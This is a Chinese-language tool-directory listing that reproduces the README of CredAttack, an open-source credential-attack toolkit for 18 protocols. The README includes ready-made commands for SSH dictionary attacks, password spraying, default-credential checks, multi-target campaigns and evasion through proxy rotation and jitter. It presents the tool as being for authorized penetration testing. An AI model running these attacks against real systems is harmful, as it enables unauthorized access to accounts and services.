Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
credential-attacks-toolkit — 用于授权安全测试的完整凭据攻击套件 — SSH、FTP、Web登录、暴力破解、字典攻击 | Kitploit
工具/GitHubGitHub/amibhai/credential-attacks-toolkit
侦察密码攻击渗透测试红队
GitHubamibhai/credential-attacks-toolkit

credential-attacks-toolkit

用于授权安全测试的完整凭据攻击套件 — SSH、FTP、Web登录、暴力破解、字典攻击

查看仓库
1251个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CredAttack — 凭据攻击工具包

Release Python Protocols Tests License

⚠️ 法律声明 — 仅限授权安全测试。
使用本工具针对您不拥有或未经明确书面许可的系统进行测试,在美国《计算机欺诈与滥用法》、英国《计算机滥用法》及全球同等法律下均属违法行为。请参阅 SECURITY.md。


目录

  • 什么是 CredAttack?
  • 攻击模式
  • 支持的协议
  • 架构
  • 快速开始
  • 安装
  • CLI 参考
  • 密码变异引擎
  • 默认凭据数据库
  • 代理轮换
  • HTML 报告
  • 配置与环境变量
  • Docker
  • 测试
  • 项目结构
  • 贡献

什么是 CredAttack?

CredAttack 是一套模块化、生产级凭据测试套件,适用于授权渗透测试项目。它覆盖了完整的凭据攻击生命周期:

阶段CredAttack 能力
侦察默认凭据数据库(200+ 组合)、基于用户名的智能模式生成
攻击17 种协议攻击器、6 种攻击模式、多目标攻击活动
规避锁定检测、可配置速率限制、抖动、代理轮换
报告JSONL 审计日志、Jinja2 HTML 报告、已发现凭据横幅 + 文件导出

攻击模式

模式命令描述
字典ssh、ftp、smb、…针对单个用户的字典攻击
喷洒spray一个密码针对用户列表(锁定安全)
组合combo每个用户 × 每个密码
智能smart基于用户名/公司生成模式
默认defaults尝试 200+ 个已知服务默认凭据
多目标multi对主机列表执行相同攻击
完整流水线full所有协议,一份报告

支持的协议

#协议模块默认端口备注
1SSHssh.py22paramiko,密钥/密码认证
2FTPftp.py21主动与被动模式
3HTTP 表单http_form.py80/443自动 CSRF 令牌检测
4HTTP Basichttp_basic.py80RFC 7617
5HTTP Digesthttp_digest.py80RFC 7616
6SMBsmb.py445impacket,NTLM
7RDPrdp.py3389impacket NLA
8SMTPsmtp.py587STARTTLS
9POP3pop3.py110支持 APOP
10IMAPimap.py143STARTTLS
11MySQLmysql.py3306mysql-connector-python
12MSSQLmssql.py1433pymssql
13Redisredis_proto.py6379AUTH 命令
14MongoDBmongodb.py27017pymongo
15WinRMwinrm.py5985NTLM,pywinrm
16LDAPldap_proto.py389ldap3,rootDSE 自动检测
17Telnettelnet.py23原始 TCP
18VNCvnc.py5900原始 DES 挑战-响应

架构

credattack.py          ← 精简入口:从检出目录执行 `python credattack.py ...`
│
├── credattack/cli.py   ← CLI(Typer)— 8 个攻击模式子命令;pip 安装后
│                          也是 `credattack` 控制台脚本
├── credattack/core/
│   ├── config.py      ← Pydantic v2 Settings,CREDATTACK_* 环境变量覆盖
│   ├── engine.py      ← AttackEngine(ThreadPoolExecutor + Rich 进度界面)
│   ├── lockout.py     ← LockoutDetector(滑动窗口,线程安全)
│   ├── proxy.py       ← ProxyRotator(轮询、健康检查、降级)
│   ├── mutator.py     ← PasswordMutator(leet、季节性、后缀、键盘行走…)
│   ├── result.py      ← AttemptResult + SessionReport 数据类
│   ├── report.py      ← Jinja2 HTML 报告生成器
│   └── logger.py      ← Rich 日志 + JSONL 审计写入器
│
├── credattack/protocols/
│   └── *.py           ← 18 个 ProtocolAttacker 实现
│
├── credattack/data/
│   ├── default_creds.json    ← 200+ 真实默认凭据组合
│   ├── smart_patterns.json   ← 140+ 企业密码模板
│   └── wordlists/            ← 按服务分类的默认密码列表
│
└── tests/             ← 50+ pytest 测试(单元 + 协议模拟)

快速开始

# 克隆并设置
git clone https://github.com/amibhai/credential-attacks-toolkit.git
cd credential-attacks-toolkit
python -m venv .venv && source .venv/bin/activate   # Windows: .venv\Scripts\activate
pip install -r requirements.txt

# 检查版本
python credattack.py --version

# 试运行(不建立连接 — 验证您的字典列表)
python credattack.py ssh -t 192.168.1.100 -u admin -P wordlists/common_passwords.txt --dry-run

# 真实 SSH 字典攻击
python credattack.py ssh -t 192.168.1.100 -u admin -P /path/to/rockyou.txt

# 密码喷洒(限速、锁定安全)
python credattack.py spray -t 192.168.1.100 --protocol ssh -U users.txt -p "Summer2024!" --delay 30

# 智能模式 — 从用户名 + 公司生成模式
python credattack.py smart -t 192.168.1.100 --protocol ssh -u john.doe --company ACME

# 尝试服务默认凭据
python credattack.py defaults -t 192.168.1.100 --protocol mysql

# 多目标攻击活动
python credattack.py multi --targets hosts.txt --protocol ssh -U users.txt -P passes.txt

安装

选项 A — pip + virtualenv(推荐)

python -m venv .venv
source .venv/bin/activate        # Windows: .venv\Scripts\activate
pip install --upgrade pip
pip install -r requirements.txt

选项 B — Makefile 快捷方式

make install      # 核心依赖
make install-dev  # + pytest-cov、ruff、mypy

选项 C — pip 安装(可编辑或从 wheel)

pip install -e .          # 仅核心依赖
pip install -e .[full]    # + SMB/RDP/MySQL/MSSQL/Redis/MongoDB/WinRM/LDAP
pip install -e .[dev]     # + pytest/ruff/mypy

credattack --version      # 控制台脚本,等同于 `python credattack.py`

选项 D — Docker

docker build -t credattack -f docker/Dockerfile .
docker run --rm credattack --help

# 挂载您的字典列表并收集输出
docker run --rm \
  -v $(pwd)/wordlists:/app/wordlists:ro \
  -v $(pwd)/output:/app/output \
  credattack ssh -t 192.168.1.100 -u admin -P wordlists/common_passwords.txt

CLI 参考

全局选项

python credattack.py [OPTIONS] COMMAND [ARGS]...

选项:
  -V, --version    显示版本并退出。
  --help           显示帮助。

通用标志(适用于所有协议命令)

标志短选项默认值描述
--target-t—目标主机 / IP
--port0(协议默认)覆盖 TCP 端口
--username-u—单个用户名
--user-file-U—换行分隔的用户名文件
--pass-file-P—换行分隔的密码文件
--password-p2—单个密码
--threads-n10并发工作线程
--timeout-T5.0每次尝试超时(秒)
--delay-d0.0固定尝试间隔延迟(秒)
--jitter0.0最大随机抖动(秒)
--stop-on-firstTrue每个用户首次命中后停止
--proxy-fileNoneHTTP/SOCKS5 代理列表
--output-dir-o./output结果目录
--verbosity-v1日志级别(0-3)
--dry-runFalse仅计数组合而不建立连接

子命令

# 协议专用(每个映射到专用攻击器)
python credattack.py ssh|ftp|smb|rdp|smtp|pop3|imap|mysql|mssql|redis|mongodb|winrm|ldap|telnet|vnc \
  -t HOST -u USER -P passes.txt

# HTTP(表单 / basic / digest)
python credattack.py http -t http://target/login --mode form \
  --form-user-field username --form-pass-field password --success-string "Dashboard"

# 喷洒 — 单个密码、多个用户、长延迟
python credattack.py spray -t HOST --protocol ssh -U users.txt -p "Password1" --delay 30

# 组合 — 用户 × 密码的笛卡尔积
python credattack.py combo -t HOST --protocol smb -U users.txt -P passes.txt

# 智能 — 基于 OSINT 的生成
python credattack.py smart -t HOST --protocol ssh -u firstname.lastname --company TargetCorp

# 默认 — 尝试厂商默认凭据
python credattack.py defaults -t HOST --protocol mysql

# 多目标 — 跨多个主机执行相同攻击
python credattack.py multi --targets hosts.txt --protocol ssh -U users.txt -P passes.txt

# 完整 — 按顺序执行所有协议
python credattack.py full -t HOST -U users.txt -P passes.txt

密码变异引擎

credattack/core/mutator.py 中的 PasswordMutator 支持可组合策略:

下载工具